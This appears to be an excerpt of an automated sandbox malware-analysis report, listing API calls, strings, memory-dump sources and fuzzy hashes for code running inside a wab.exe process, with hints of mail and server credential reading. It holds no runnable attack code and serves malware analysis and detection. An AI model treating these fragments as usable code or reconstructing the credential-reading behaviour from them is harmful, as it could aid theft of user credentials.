                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1992179935-0
                                                                                  • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                  • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                  • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                  • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • too many SQL variables, xrefs: 0042C6FD
                                                                                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                  • API String ID: 2221118986-515162456
                                                                                  • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                  • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                  • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                  • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                  • memset.MSVCRT ref: 004026AD
                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                    • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                  • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1593657333-0
                                                                                  • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                  • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                  • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                  • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C922
                                                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$MenuPostSendStringmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3798638045-0
                                                                                  • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                  • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                  • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                  • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                                                  • strlen.MSVCRT ref: 0040B60B
                                                                                  • atoi.MSVCRT ref: 0040B619
                                                                                  • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                  • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                  • String ID:
                                                                                  • API String ID: 4107816708-0
                                                                                  • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                  • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                  • String ID:
                                                                                  • API String ID: 1886415126-0
                                                                                  • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                  • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                  • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                  • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: strlen
                                                                                  • String ID: >$>$>
                                                                                  • API String ID: 39653677-3911187716
                                                                                  • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                  • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: @
                                                                                  • API String ID: 3510742995-2766056989
                                                                                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 0040797A
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                                                                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                    • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                                                                    • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                                                                  • memcpy.MSVCRT ref: 004079DD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1171893557-0
                                                                                  • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                  • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                  • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                  • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcmpi
                                                                                  • String ID: C@$mail.identity
                                                                                  • API String ID: 1439213657-721921413
                                                                                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00406640
                                                                                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                                                  • memcmp.MSVCRT ref: 00406672
                                                                                  • memcpy.MSVCRT ref: 00406695
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset$memcmp
                                                                                  • String ID: Ul@
                                                                                  • API String ID: 270934217-715280498
                                                                                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                  • sprintf.MSVCRT ref: 0040B929
                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                  • sprintf.MSVCRT ref: 0040B953
                                                                                  • _mbscat.MSVCRT ref: 0040B966
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                  • String ID:
                                                                                  • API String ID: 203655857-0
                                                                                  • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                  • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                  • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                  • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040ADE8
                                                                                  • memset.MSVCRT ref: 0040ADFE
                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                  • sprintf.MSVCRT ref: 0040AE28
                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                  • String ID: </%s>
                                                                                  • API String ID: 3699762281-259020660
                                                                                  • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                  • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                  • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                  • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                  • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                  Strings
                                                                                  • recovered %d pages from %s, xrefs: 004188B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                  • String ID: recovered %d pages from %s
                                                                                  • API String ID: 985450955-1623757624
                                                                                  • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                  • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                  • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                  • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _ultoasprintf
                                                                                  • String ID: %s %s %s
                                                                                  • API String ID: 432394123-3850900253
                                                                                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00409919
                                                                                  • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendmemset
                                                                                  • String ID: N\@
                                                                                  • API String ID: 568519121-3851889168
                                                                                  • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                  • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                  • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                  • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                  • sprintf.MSVCRT ref: 0040909B
                                                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                  • String ID: menu_%d
                                                                                  • API String ID: 1129539653-2417748251
                                                                                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _msizerealloc
                                                                                  • String ID: failed memory resize %u to %u bytes
                                                                                  • API String ID: 2713192863-2134078882
                                                                                  • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                  • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                  • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                  • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                  • strrchr.MSVCRT ref: 00409808
                                                                                  • _mbscat.MSVCRT ref: 0040981D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName_mbscatstrrchr
                                                                                  • String ID: _lng.ini
                                                                                  • API String ID: 3334749609-1948609170
                                                                                  • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                  • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                  • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                  • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _mbscpy.MSVCRT ref: 004070EB
                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                  • _mbscat.MSVCRT ref: 004070FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscat$_mbscpystrlen
                                                                                  • String ID: sqlite3.dll
                                                                                  • API String ID: 1983510840-1155512374
                                                                                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileString
                                                                                  • String ID: A4@$Server Details
                                                                                  • API String ID: 1096422788-4071850762
                                                                                  • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                  • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                  • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                  • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$memset
                                                                                  • String ID:
                                                                                  • API String ID: 438689982-0
                                                                                  • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                  • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                  • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                  • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3110682361-0
